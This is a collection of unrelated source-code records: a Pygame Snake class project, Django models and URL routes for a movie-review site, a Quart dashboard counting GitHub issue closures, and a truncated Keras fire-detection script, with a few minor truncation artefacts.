+{"seq_id":"644526756","text":"#Ivana Olvera Mérida A01746744\r\n#FINAL PROJECT: bring together everything learned during the course\r\n#to build a simple video game in Python.\r\n#Video game: SNAKE\r\n\r\nimport pygame\r\nimport random\r\n\r\n#Screen dimensions\r\nfrom pygame.sprite import Sprite\r\n\r\nANCHO = 800\r\nALTO = 600\r\n#Colors\r\nBLANCO = (255, 255, 255)\r\nVERDE_BANDERA = (27, 94, 32)\r\nROJO = (255, 0, 0)\r\nAZUL = (0, 0, 255)\r\nAMARILLO = (239, 239, 4)\r\nNEGRO = (0, 0, 0)\r\n\r\n\r\ndef checarColisiones(listaComida, listaSerpiente):\r\n    estatus = False  # the status starts as False = 0\r\n    for serpiente in listaSerpiente:\r\n        borrarComida = False\r\n        for k in range(len(listaComida) - 1, -1, -1):\r\n            comida = listaComida[k]\r\n            xb, yb, ab, alb = serpiente.rect\r\n            xe, ye, ae, ale = comida.rect\r\n            if (xe == xb and yb == ye and ab == ae and alb == ale):\r\n                estatus = True\r\n                borrarComida = True\r\n        if borrarComida == True:  # if the snake hit the food, borrarComida becomes True\r\n            listaComida.pop()  # remove the stored item\r\n\r\n    if estatus == True:  # if a snake/food collision happened, return one point; otherwise return 0\r\n        return 1\r\n    else:\r\n        return 0\r\n\r\ndef dibujarSerpiente(ventana, listaSerpiente):\r\n    for serpiente in listaSerpiente:\r\n        ventana.blit(serpiente.image, serpiente.rect)  # draw the snake image with its rect\r\n\r\ndef dibujarComida(ventana, listaComida):\r\n    for comida in listaComida:\r\n        ventana.blit(comida.image, comida.rect)  # draw the food image with its rect\r\n\r\ndef dibujarMouse(ventana, xMouse, yMouse):\r\n    if xMouse != -1:\r\n        pygame.draw.circle(ventana, BLANCO, (xMouse, yMouse), 50)  # draw a white circle when the click was outside the defined zone\r\n\r\ndef dibujarFondoMenu(ventana, fondoMenu):  # draw the main menu background\r\n    ventana.blit(fondoMenu, (0, 0))\r\n\r\ndef dibujarBotonJugar(ventana, botonJugar):  # show the play button on the menu\r\n    ventana.blit(botonJugar, (125, 300))\r\n\r\ndef dibujarBotonPuntuaciones(ventana, botonPuntos):  # show the scores button on the menu\r\n    ventana.blit(botonPuntos, (125, 360))\r\n\r\ndef dibujarBotonInfo(ventana, botonInfo):  # show the information button on the menu\r\n    ventana.blit(botonInfo, (125, 420))\r\n\r\ndef dibujarFondo(ventana, fondo):\r\n    ventana.blit(fondo, (0, 0))\r\n\r\ndef dibujarBotonMenu(ventana, botonMenu):\r\n    ventana.blit(botonMenu, (625, 465))\r\n\r\ndef dibujarBotonMenuJugar(ventana, botonMenuJuego):  # draw the menu button inside the game\r\n    ventana.blit(botonMenuJuego, (675, 525))\r\n\r\ndef cuadricula(ventana):  # draw the grid used as the game background while estado == JUGANDO\r\n    xInicial = 0\r\n    xFinal = 800\r\n    y = 0\r\n    x = 0\r\n    yInicial = 0\r\n    yFinal = 500\r\n    for i in range(1, 12, 1):\r\n        pygame.draw.line(ventana, BLANCO, (xInicial, y), (xFinal, y), 1)\r\n        y = y + 50\r\n    for k in range(1, 17, 1):\r\n        pygame.draw.line(ventana, BLANCO, (x, yInicial), (x, yFinal), 1)\r\n        x = x + 50\r\n\r\ndef dibujarMarcador(ventana, comidos, fuente):\r\n    texto = fuente.render(\"Puntuación: \" + str(comidos), 1, BLANCO)\r\n    ventana.blit(texto, (60,545))\r\n\r\ndef registrarPuntos(puntos):  # record the player's score\r\n    with open(\"Puntuaciones.txt\", \"w\", encoding=\"UTF-8\") as salida:\r\n        salida.write(\"%d\\n\" % puntos)\r\n\r\n\r\ndef crearComida(listaComida, imgComida):\r\n    Comida = pygame.sprite.Sprite()\r\n    Comida.image = imgComida\r\n    Comida.rect = imgComida.get_rect()\r\n    Comida.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750))  # grid columns where food may appear at random\r\n    Comida.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450))  # grid rows where food may appear at random\r\n    listaComida.append(Comida)\r\n\r\n\r\n\r\ndef moverSerpiente(listaSerpiente, coordenadaX, coordenadaY, listaComida):\r\n    cabeza = listaSerpiente[:][0]  # copy\r\n    auxiliar = pygame.sprite.Sprite()\r\n    auxiliar.rect = cabeza.image.get_rect()\r\n    auxiliar.rect.left += cabeza.rect.left + coordenadaX\r\n    auxiliar.rect.top += cabeza.rect.top + coordenadaY\r\n    cuadroRojo = listaComida[0]\r\n    if auxiliar.rect == cuadroRojo.rect:\r\n        # add a new green square (new head)\r\n        nuevoVerde = pygame.sprite.Sprite()\r\n        nuevoVerde.image = cabeza.image\r\n        nuevoVerde.rect = cuadroRojo.rect\r\n        listaSerpiente.insert(0, nuevoVerde)\r\n        listaComida.remove(cuadroRojo)\r\n\r\n    else:  # no collision, normal movement\r\n        cola = listaSerpiente[:][-1]  # last element\r\n        cola.rect = auxiliar.rect\r\n        listaSerpiente.pop()  # drop the old tail\r\n        listaSerpiente.insert(0, cola)\r\n\r\ndef actualizarSerpiente(listaSerpiente, imgSerpiente, colaC):\r\n    Cola = pygame.sprite.Sprite()\r\n    Cola.image = imgSerpiente\r\n    Cola.rect = imgSerpiente.get_rect()\r\n    Cola.rect.left = colaC.rect.left\r\n    Cola.rect.top = colaC.rect.top\r\n    listaSerpiente.insert(0,Cola)\r\n\r\n\r\ndef probarPerder(listaSerpiente):\r\n    cabeza = listaSerpiente[0]\r\n    if cabeza.rect.left < 0 or cabeza.rect.left > ANCHO:\r\n        return True\r\n    if cabeza.rect.top < 0 or cabeza.rect.top > 450:\r\n        return True\r\n\r\ndef leerPuntuaciones(archivoTexto):\r\n    entrada = open(archivoTexto, \"r\", encoding=\"UTF-8\")\r\n    lista = []\r\n    for linea in entrada:\r\n        if linea == '\\n':\r\n            pass\r\n        else:\r\n            lista.append(linea)\r\n    entrada.close()\r\n    return lista\r\n\r\ndef escribirPuntuaciones(archivoTexto, puntos):\r\n    entrada = open(archivoTexto, \"w\", encoding=\"UTF-8\")\r\n    entrada.write(str(puntos))\r\n    entrada.close()\r\n\r\n\r\ndef dibujar():\r\n\r\n    # initialize the pygame engine\r\n    pygame.init()\r\n    # create an ANCHO x ALTO window\r\n    ventana = pygame.display.set_mode((ANCHO, ALTO))  # the window everything is drawn on\r\n    reloj = pygame.time.Clock()  # used to cap the frame rate\r\n    termina = False  # flag that ends the main loop; assume we keep running\r\n\r\n    #IMAGES\r\n    botonJugar = pygame.image.load(\"button_jugar.png\")\r\n    botonPuntos = pygame.image.load(\"button_puntuaciones.png\")\r\n    botonInfo = pygame.image.load(\"button_informacion.png\")\r\n    botonMenu = pygame.image.load(\"button_menu.png\")\r\n    botonMenuJuego = pygame.image.load(\"button_menu.png\")\r\n    fondoMenu = pygame.image.load(\"FondoSnake.png\")\r\n    fondo = pygame.image.load(\"Fondo.png\")\r\n\r\n    #SPRITES\r\n    imgSerpiente = pygame.image.load(\"cuboSerpiente.png\")\r\n    Serpiente = pygame.sprite.Sprite()\r\n    Serpiente.image = imgSerpiente\r\n    Serpiente.rect = imgSerpiente.get_rect()\r\n    Serpiente.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750))\r\n    Serpiente.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450))\r\n\r\n    imgComida = pygame.image.load(\"cuboComida.png\")\r\n    Comida = pygame.sprite.Sprite()\r\n    Comida.image = imgComida\r\n    Comida.rect = imgComida.get_rect()\r\n    Comida.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750))\r\n    Comida.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450))\r\n\r\n    #AUDIO\r\n    pygame.mixer.init()\r\n    pygame.mixer.music.load(\"MusicaJuego.mp3\")\r\n    pygame.mixer.music.play(-1)\r\n\r\n    #TEXT\r\n    fuente = pygame.font.SysFont(\"Showcard Gothic\", 25)\r\n\r\n    #MOUSE\r\n    xMouse = -1\r\n    yMouse = -1\r\n\r\n    #STATES\r\n    MENU = 1\r\n    JUGANDO = 2\r\n    PUNTUACION = 3\r\n    INFORMACION = 4\r\n    GANAR = 5\r\n    PERDER = 6\r\n    estado = MENU\r\n\r\n    #LISTS\r\n    listaComida = [Comida]\r\n    listaSerpiente = [Serpiente]\r\n\r\n    puntos = 0\r\n\r\n    coorX = 50\r\n    coorY = 0\r\n\r\n    while not termina:  # main loop: repeats while termina is False\r\n        # process incoming events\r\n        for evento in pygame.event.get():\r\n            if evento.type == pygame.QUIT:  # the user clicked the close button\r\n                termina = True  # end the loop\r\n            elif evento.type == pygame.MOUSEBUTTONDOWN:\r\n                # a mouse button was pressed\r\n                xMouse, yMouse = pygame.mouse.get_pos()\r\n                print(xMouse, yMouse)\r\n                if estado == MENU:\r\n                    if xMouse >= 125 and xMouse <= 325 and yMouse >= 300 and yMouse <= 350:  # coordinates of the button's rectangle\r\n                        # the play button was pressed, change state\r\n                        xMouse = -1\r\n                        estado = JUGANDO\r\n                        puntos = 0\r\n                        Serpiente.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750))\r\n                        Serpiente.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450))\r\n                        listaSerpiente = [Serpiente]\r\n                        listaComida = []\r\n                        crearComida(listaComida, imgComida)\r\n\r\n                    if xMouse >= 125 and xMouse <= 330 and yMouse >= 360 and yMouse <= 410:\r\n                        # the scores button was pressed, change state\r\n                        xMouse = -1\r\n                        estado = PUNTUACION\r\n                    if xMouse >= 125 and xMouse <= 325 and yMouse >= 420 and yMouse <= 470:\r\n                        # the information button was pressed, change state\r\n                        xMouse = -1\r\n                        estado = INFORMACION\r\n\r\n            elif evento.type == pygame.KEYDOWN:\r\n                if estado == JUGANDO:  # keys that set the snake's direction\r\n                    if evento.key == pygame.K_UP:\r\n                        coorX = 0\r\n                        coorY = -50\r\n                    elif evento.key == pygame.K_DOWN:\r\n                        coorX = 0\r\n                        coorY = 50\r\n                    elif evento.key == pygame.K_LEFT:\r\n                        coorX = -50\r\n                        coorY = 0\r\n                    elif evento.key == pygame.K_RIGHT:\r\n                        coorX = 50\r\n                        coorY = 0\r\n\r\n\r\n        # clear the screen\r\n        ventana.fill(NEGRO)\r\n\r\n        if estado == JUGANDO:\r\n            if xMouse >= 675 and xMouse <= 775 and yMouse >= 525 and yMouse <= 575:\r\n                # the MENU button was pressed, change state\r\n                xMouse = -1\r\n                estado = MENU\r\n\r\n            moverSerpiente(listaSerpiente, coorX, coorY, listaComida)\r\n\r\n            cuadricula(ventana)\r\n            dibujarBotonMenuJugar(ventana, botonMenuJuego)\r\n            dibujarSerpiente(ventana, listaSerpiente)\r\n            dibujarComida(ventana, listaComida)\r\n            dibujarMarcador(ventana, puntos, fuente)\r\n\r\n            resultado = probarPerder(listaSerpiente)\r\n            if resultado == True:\r\n                archivoTexto = \"Puntuaciones.txt\"\r\n                escribirPuntuaciones(archivoTexto, puntos)\r\n                estado = PERDER\r\n\r\n            if listaComida == []:  # the list is empty because the snake already ate the food\r\n                colaC = listaSerpiente[len(listaSerpiente)-1]\r\n                crearComida(listaComida, imgComida)  # spawn a new one; the previous one was eaten\r\n                puntos += 1\r\n                if puntos == 15:\r\n                    estado = GANAR\r\n\r\n\r\n        if estado == GANAR:\r\n            dibujarBotonMenuJugar(ventana, botonMenuJuego)\r\n            archivoTexto = \"Puntuaciones.txt\"\r\n            escribirPuntuaciones(archivoTexto, puntos)\r\n            if xMouse >= 675 and xMouse <= 775 and yMouse >= 525 and yMouse <= 575:\r\n                # the MENU button was pressed, change state\r\n                xMouse = -1\r\n                estado = MENU\r\n\r\n            # draw the text\r\n            textoGanar1 = fuente.render(\"¡GANASTE!\", 1, AMARILLO)\r\n            textoGanar2 = fuente.render(\"Lograste obtener 15 puntos\", 1, AMARILLO)\r\n            textoGanar3 = fuente.render(\"Presiona el botón MENÚ para volver a jugar\", 1, AMARILLO)\r\n            ventana.blit(textoGanar1, (60, 150))\r\n            ventana.blit(textoGanar2, (60, 300))\r\n            ventana.blit(textoGanar3, (60, 330))\r\n\r\n        if estado == PERDER:\r\n            dibujarBotonMenuJugar(ventana, botonMenuJuego)\r\n            if xMouse >= 675 and xMouse <= 775 and yMouse >= 525 and yMouse <= 575:\r\n                # the MENU button was pressed, change state\r\n                xMouse = -1\r\n                estado = MENU\r\n\r\n            # draw the text\r\n            textoPerder1 = fuente.render(\"Has perdido\", 1, AZUL)\r\n            textoPerder2 = fuente.render(\"Presiona el botón MENÚ para volver a jugar\", 1, AZUL)\r\n            ventana.blit(textoPerder1, (60, 150))\r\n            ventana.blit(textoPerder2, (60, 300))\r\n\r\n\r\n        if estado == MENU:\r\n            dibujarMouse(ventana, xMouse, yMouse)\r\n            dibujarFondoMenu(ventana, fondoMenu)\r\n            dibujarBotonJugar(ventana, botonJugar)\r\n            dibujarBotonPuntuaciones(ventana, botonPuntos)\r\n            dibujarBotonInfo(ventana, botonInfo)\r\n\r\n        elif estado == PUNTUACION:\r\n            dibujarFondo(ventana, fondo)\r\n            dibujarBotonMenu(ventana, botonMenu)\r\n            puntuaciones = leerPuntuaciones(\"Puntuaciones.txt\")\r\n            registroPuntos = puntuaciones[-1] if puntuaciones else \"0\"  # guard: the file may be empty on first run\r\n            print(puntuaciones)\r\n\r\n            # draw the text\r\n            textoPuntuacion1 = fuente.render(\"PUNTUACIONES\", 1, ROJO)\r\n            textoPuntuacion2 = fuente.render(\"La última puntuación lograda fue: \", 1, ROJO)\r\n            textoPuntuacion3 = fuente.render(registroPuntos, 1, ROJO)\r\n            ventana.blit(textoPuntuacion1, (300,100))\r\n            ventana.blit(textoPuntuacion2, (100, 200))\r\n            ventana.blit(textoPuntuacion3, (100, 250))\r\n            if xMouse >= 625 and xMouse <= 725 and yMouse >= 465 and yMouse <= 515:\r\n                # the MENU button was pressed, change state\r\n                xMouse = -1\r\n                estado = MENU\r\n\r\n        elif estado == INFORMACION:\r\n            dibujarFondo(ventana, fondo)\r\n            dibujarBotonMenu(ventana, botonMenu)\r\n\r\n            # draw the text\r\n            textoInfo1 = fuente.render(\"Fundamentos de programación: Proyecto Final \",1,NEGRO)\r\n            textoInfo2 = fuente.render(\"Ivana Olvera Mérida A01746744\", 1, NEGRO)\r\n            textoInfo3 = fuente.render(\"Instrucciones del juego\",1,NEGRO)\r\n            textoInfo4 = fuente.render(\"El usuario se encarga de controlar una criatura\", 1, NEGRO)\r\n            textoInfo5 = fuente.render(\"larga y delgada, similar a una serpiente, que se\",1,NEGRO)\r\n            textoInfo6 = fuente.render(\"desplaza en un plano delimitado mientras recoge\",1,NEGRO)\r\n            textoInfo7 = fuente.render(\"alimentos; debe evitar golpear alguna parte de\",1,NEGRO)\r\n            textoInfo8 = fuente.render(\"las paredes que rodean el área sobre la cual se\",1,NEGRO)\r\n            textoInfo9 = fuente.render(\"desplaza.\",1,NEGRO)\r\n            ventana.blit(textoInfo1,(60,100))\r\n            ventana.blit(textoInfo2,(60,150))\r\n            ventana.blit(textoInfo3,(250,250))\r\n            ventana.blit(textoInfo4,(60, 300))\r\n            ventana.blit(textoInfo5,(60, 330))\r\n            ventana.blit(textoInfo6,(60,360))\r\n            ventana.blit(textoInfo7, (60, 390))\r\n            ventana.blit(textoInfo8,(60, 420))\r\n            ventana.blit(textoInfo9,(60,450))\r\n\r\n            if xMouse >= 625 and xMouse <= 725 and yMouse >= 465 and yMouse <= 515:\r\n                # the MENU button was pressed, change state\r\n                xMouse = -1\r\n                estado = MENU\r\n\r\n\r\n        pygame.display.flip()  # update the display (nothing is drawn without this call)\r\n        reloj.tick(3)  # 3 fps: this is the snake's step rate\r\n\r\n    # after the main loop\r\n    pygame.quit()  # shut down pygame\r\n\r\n\r\n# main entry point\r\ndef main():\r\n    dibujar()  # run the game loop\r\n\r\nmain()\r\n\r\n","sub_path":"ProyectoFinal.py","file_name":"ProyectoFinal.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
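The spawn positions above are drawn from hand-written tuples of multiples of 50. The same grid alignment can be expressed with range(), which stays correct if the playfield size changes; a sketch (CELDA and posicion_aleatoria are names introduced here, not from the game):

import random

ANCHO, ALTO_JUEGO, CELDA = 800, 500, 50   # playfield is 800x500; the bottom 100 px holds the score bar

def posicion_aleatoria():
    # any 50px-aligned cell of the 16x10 grid, matching the sprite placement above
    x = random.choice(range(0, ANCHO, CELDA))
    y = random.choice(range(0, ALTO_JUEGO, CELDA))
    return x, y

print(posicion_aleatoria())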
import models\nfrom django.contrib.auth.models import User\n\nfrom order.models import Order\n\n\nclass Ledger(models.Model):\n customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name='ledgers')\n order = models.ForeignKey(Order, on_delete=models.CASCADE, null=True, related_name='order_ledgers')\n transaction_date = models.DateTimeField(auto_now_add=True)\n amount = models.FloatField(null=False)\n post_balance = models.FloatField(null=False)\n\n\nclass Invoice(models.Model):\n customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name='invoices')\n order = models.OneToOneField(Order, on_delete=models.CASCADE, related_name='invoice')\n agent = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_invoices')\n amount = models.FloatField(null=False)\n creation_date = models.DateTimeField(auto_now_add=True)\n updation_date = models.DateTimeField(auto_now=True)\n","sub_path":"dehaat/financialaccount/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"440235432","text":"import os\nimport humanize\nimport sys\nfrom quart_trio import QuartTrio\nimport os\nimport datetime\nimport trio\nimport asks\nfrom pathlib import Path\nPAT = os.environ['PAT']\n\nheaders = {\"Authorization\": f\"Bearer {PAT}\"}\n\nfrom cachetools.func import ttl_cache, TTLCache\n\nRC = TTLCache(1024, ttl=240)\n\n\nONGOING = datetime.datetime.now() > datetime.datetime(2021, 11, 1, 0, 0)\n\nif ONGOING:\n CUT_DATE = \"2021-11-01\"\nelse:\n CUT_DATE = \"2020-11-01\"\n\n\n# in https://docs.github.com/en/graphql/overview/explorer\n# trying to find oldest created issue.\nLONGEST_OPEN_QUERRY = (\n \"\"\"\n{\n search(query: \"topic:closember\", type: REPOSITORY, last: 100) {\n issueCount\n edges {\n node {\n ... on Repository {\n issues(first: 100, orderBy: {field: CREATED_AT, direction: ASC}, states: CLOSED, filterBy: {since:\\\"\"\"\"\n + CUT_DATE\n + \"\"\"T00:00:00Z\"}) {\n edges {\n node {\n closedAt\n url\n createdAt\n number\n }\n }\n }\n nameWithOwner\n }\n }\n }\n }\n rateLimit {\n limit\n cost\n remaining\n resetAt\n }\n}\n\"\"\"\n)\n\nprint(LONGEST_OPEN_QUERRY)\n\n\n# @ttl_cache( ttl=240)\nasync def run_query(\n query,\n): # A simple function to use requests.post to make the API call. Note the json= section.\n RC.expire()\n res = RC.get(query, None)\n if res is None:\n\n request = await asks.post(\n \"https://api.github.com/graphql\", json={\"query\": query}, headers=headers\n )\n if request.status_code == 200:\n res = request.json()\n RC[query] = res\n return res\n else:\n raise Exception(\n \"Query failed to run by returning code of {}. {}\".format(\n request.status_code, query\n )\n )\n else:\n return res\n\n \n\nSTARGAZERS = \"\"\"\n{\n repository(name: \"closember\", owner: \"openteamsinc\") {\n stargazers(last: 100) {\n totalCount\n edges {\n node {\n avatarUrl\n login\n url\n followers {\n totalCount\n }\n }\n }\n }\n }\n}\n\"\"\"\n\n# The GraphQL query (with a few aditional bits included) itself defined as a multi-line string.\n\nPARTICIP = \"\"\"\nquery TopicRepo {\n search(query: \"topic:closember\", type: REPOSITORY, first: 100) {\n edges {\n \n node {\n \t\t\t... 
on Repository {\n name\n owner{login}\n }\n }\n }\n }\n}\n\"\"\"\n\n\ndef query(slug):\n return (\n \"\"\"\n{\n search(query: \"repo:\"\"\"\n + slug\n + \"\"\" is:closed created:<\"\"\"\n + CUT_DATE\n + \"\"\" closed:>\"\"\"\n + CUT_DATE\n + \"\"\"\", type: ISSUE, last:100) {\n issueCount\n edges{\n node{\n __typename\n }\n }\n }\n rateLimit {\n limit\n cost\n remaining\n resetAt\n }\n}\n\"\"\"\n )\n\n\ndef query_open(slug, type_):\n res = (\n \"\"\"\n{\n search(query: \"repo:\"\"\"\n + slug\n + f\"\"\" is:open is:{type_}\",\"\"\"\n + \"\"\" type: ISSUE, last: 100) \n {\n issueCount\n }\n rateLimit {\n limit\n cost\n remaining\n resetAt\n }\n\n \n}\n\"\"\"\n )\n return res\n\n\n# result = run_query(query) # Execute the query\n# remaining_rate_limit = result[\"data\"][\"rateLimit\"][\"remaining\"] # Drill down the dictionary\n# print(\"Remaining rate limit - {}\".format(remaining_rate_limit))\n\nfrom jinja2 import Environment, FileSystemLoader, PackageLoader, select_autoescape\n\n\n# app = Flask(__name__)\napp = QuartTrio(__name__)\n\n\nslugs = [\n]\n\nfrom collections import Counter\n\n\nasync def get_p():\n data = await run_query(PARTICIP)\n data = data[\"data\"][\"search\"][\"edges\"]\n return [n[\"node\"][\"owner\"][\"login\"] + \"/\" + n[\"node\"][\"name\"] for n in data] + slugs\n\n\n@app.route(\"/\")\nasync def hello_world():\n return await render()\n\n\n@app.route(\"/hero.svg\")\nasync def hero():\n with open(\"hero.svg\") as f:\n return f.read()\n\n\nasync def get_longest_open():\n res = await run_query(LONGEST_OPEN_QUERRY)\n from dateutil.parser import isoparse\n from collections import namedtuple\n\n LongestClosed = namedtuple(\n \"LongestClosed\", \"delta,repo,url,open,closed,number\".split(\",\")\n )\n\n duration_pairs = []\n for repo in res[\"data\"][\"search\"][\"edges\"]:\n dpl = []\n reponame = repo[\"node\"][\"nameWithOwner\"]\n for issue in repo[\"node\"][\"issues\"][\"edges\"]:\n\n closed = isoparse(issue[\"node\"][\"closedAt\"])\n opened = isoparse(issue[\"node\"][\"createdAt\"])\n dpl.append(\n LongestClosed(\n closed - opened,\n reponame,\n issue[\"node\"][\"url\"],\n opened,\n closed,\n issue[\"node\"][\"number\"],\n )\n )\n if dpl:\n duration_pairs.append(list(sorted(dpl, reverse=True))[0])\n\n return list(sorted(duration_pairs, reverse=True))\n\n\nasync def render():\n\n env = Environment(\n loader=FileSystemLoader(os.path.dirname(__file__)),\n autoescape=select_autoescape([\"tpl\"]),\n extensions=[\"jinja_markdown.MarkdownExtension\"],\n )\n env.filters[\"naturaldelta\"] = humanize.naturaldelta\n tpl = env.get_template(\"page.tpl\")\n entries = {}\n remaining = {}\n rq = 5000\n\n reses1 = {}\n reses2 = {}\n reses3 = {}\n\n async def loc(storage, key, query):\n storage[key] = await run_query(query)\n\n async def get_sg(sgs):\n sgs.update(await run_query(STARGAZERS))\n\n print(\"Start contacting github...\")\n slgs = sorted(set(await get_p()))\n other = await get_longest_open()\n async with trio.open_nursery() as n:\n for s in slgs:\n n.start_soon(loc, reses1, s, query(s))\n n.start_soon(loc, reses2, s, query_open(s, \"pr\"))\n n.start_soon(loc, reses3, s, query_open(s, \"issue\"))\n sgs = {}\n n.start_soon(get_sg, sgs)\n print(\"Done\")\n\n all_sg = sgs[\"data\"][\"repository\"][\"stargazers\"]\n sg_total = all_sg[\"totalCount\"]\n top_sg = [\n {\n \"login\": x[\"node\"][\"login\"],\n \"avatar\": x[\"node\"][\"avatarUrl\"],\n \"url\": x[\"node\"][\"url\"],\n }\n for x in all_sg[\"edges\"]\n ]\n\n for s in slgs:\n # await loc(reses1, s, query(s))\n res1 = 
reses1[s]\n res2 = reses2[s]\n res3 = reses3[s]\n\n rq = min(rq, res1[\"data\"][\"rateLimit\"][\"remaining\"])\n\n search = res1[\"data\"][\"search\"]\n entries[s] = search[\"issueCount\"]\n c = Counter([s[\"node\"][\"__typename\"] for s in search[\"edges\"]])\n entries[s] = dict(c)\n\n rq = min(rq, res2[\"data\"][\"rateLimit\"][\"remaining\"])\n prs = res2[\"data\"][\"search\"][\"issueCount\"]\n\n rq = min(rq, res3[\"data\"][\"rateLimit\"][\"remaining\"])\n issues = res3[\"data\"][\"search\"][\"issueCount\"]\n\n remaining[s] = {\"Issue\": issues, \"PullRequest\": prs}\n\n rq = min(rq, res3[\"data\"][\"rateLimit\"][\"remaining\"])\n print(\"Rate limit:\", rq)\n\n print(\"rendering...\")\n entries = [(k, v) for k, v in entries.items()]\n remaining = [(k, v) for k, v in remaining.items()]\n\n total_closed = sum(\n [v[1].get(\"Issue\", 0) + v[1].get(\"PullRequest\", 0) for v in entries]\n )\n\n to_go = sum([v[1].get(\"Issue\", 0) + v[1].get(\"PullRequest\", 0) for v in remaining])\n\n entries = list(\n sorted(entries, key=lambda x: x[1].get(\"Issue\", 0) + x[1].get(\"PullRequest\", 0))\n )\n remaining = list(\n sorted(\n remaining, key=lambda x: x[1].get(\"Issue\", 0) + x[1].get(\"PullRequest\", 0)\n )\n )\n svg = Path(\"hero.svg\").read_text()\n res = tpl.render(\n entries=entries,\n rq=rq,\n remaining=remaining,\n total_closed=total_closed,\n to_go=to_go,\n other=other,\n CUT_DATE=CUT_DATE,\n ONGOING=ONGOING,\n NOW=datetime.datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\n sg_total=sg_total,\n top_sg=top_sg,\n svg=svg,\n )\n print(\"done\")\n return res\n\n\n@app.route(\"/\")\ndef addp(p):\n global slugs\n try:\n org,name = p.split('/')\n if org.isalnum() and name.isalnum():\n slugs.append(p)\n return 'ok'\n except Exception:\n return 'no'\n\n\ndef main():\n\n port = os.environ.get(\"PORT\", 5000)\n print(\"Seen config port \", port)\n prod = os.environ.get(\"PROD\", None)\n if prod:\n app.run(port=port, host=\"0.0.0.0\")\n else:\n app.run(port=port)\n\n\nif __name__ == \"__main__\":\n if \"static\" in sys.argv:\n build = Path(\"build\")\n build.mkdir(exist_ok=True)\n p = build / \"index.html\"\n p.write_text(trio.run(render))\n print(f\"written to {p}\")\n\n assets = Path(\"assets\")\n (build / \"assets\").mkdir(exist_ok=True)\n for img in assets.glob(\"*\"):\n (build / \"assets\" / img.name).write_bytes(img.read_bytes())\n\n else:\n main()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"356127807","text":"\"\"\"\nDefinition of urls for DjangoMovieReviewSite.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\nfrom django.contrib import admin\nimport app.forms\nimport app.views\nfrom django.urls import include, path\n\n\n# Uncomment the next lines to enable the admin:\n# from django.conf.urls import include\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = [\n # Examples:\n path('', app.views.home, name='home'),\n path('home/', app.views.home, name='home'),\n path('contact', app.views.contact, name='contact'),\n path('about', app.views.about, name='about'),\n path('movie//', app.views.movie, name='movie'),\n path('signup', app.views.signup, name='signup'), \n path('login',\n django.contrib.auth.views.LoginView.as_view(),\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title': 'Log 
in',\n                'year': datetime.now().year,\n            }\n        },\n        name='login'),\n    path('logout',\n        django.contrib.auth.views.LogoutView.as_view(),\n        {\n            'next_page': '/',\n        },\n        name='logout'),\n    path('accounts/', include('django.contrib.auth.urls')),\n\n]\n\nurlpatterns = urlpatterns + [\n    path('admin/', admin.site.urls),\n    path('accounts/', include('django.contrib.auth.urls')),\n    path('search_results//', app.views.search_results, name='search_results'),\n    path('add_review//', app.views.add_review, name='add_review'),\n    path('view_review//', app.views.view_review, name='view_review'),\n    path('user//', app.views.user, name=\"user\"),\n    path('reviews/', app.views.reviews, name=\"reviews\")\n]\n","sub_path":"DjangoMovieReviewSite/DjangoMovieReviewSite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"388765050","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nfrom datetime import datetime\nfrom keras.models import load_model\n\ndef preprocess_input_data(img):\n    img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n    img_gray = (255 - img_gray)\n    img_gray = cv2.cvtColor(img_gray, cv2.COLOR_GRAY2RGB)\n    return img_gray\n\n\ndef get_model(path):\n    return load_model(path)\n\n\ndef get_photo_annotation(img, fire_presence=f'FIRE DETECTED', position=(10, 50), color=(0, 0, 255, 0)):\n    image_text = fire_presence + datetime.now().strftime(\"%h-%m-%s\")\n    return cv2.putText(img, image_text, position, cv2.FONT_HERSHEY_SIMPLEX, 1, color, 3)\n\n\ndef distance(height_tree_px, focal_lenght=0.00444, tree_height=37):\n    height_object_px = height_tree_px\n    image_size = [1280, 720] # pixels\n    matrix_size = [5.1, 3.8] # millimeters\n\n    focus = focal_lenght\n    height_object = tree_height\n    height_on_matrix = (matrix_size[0] / 1000) / image_size[0] * height_object_px\n\n    distance = (focus * height_object) / height_on_matrix\n    return round(distance)\n\n\ndef video_analyze(video_path, model_path):\n    model = get_model(model_path)\n\n    cap = cv2.VideoCapture(video_path)\n\n    if not cap.isOpened():\n        print('Cannot open video file')\n\n    while cap.isOpened():\n        fl, img_frame = cap.read()\n        if img_frame is None:\n            break\n\n        image = Image.fromarray(img_frame.astype('uint8'), 'RGB').resize((320, 320))\n\n        image = np.asarray(image)\n        image = preprocess_input_data(image)\n        image = np.expand_dims(image, axis=0)\n\n        model_predicts = np.argmax(model.predict(image))\n\n        if model_predicts == 0:\n            get_photo_annotation(image)\n            print(image.shape)\n\n            distance_to_fire = distance(14) 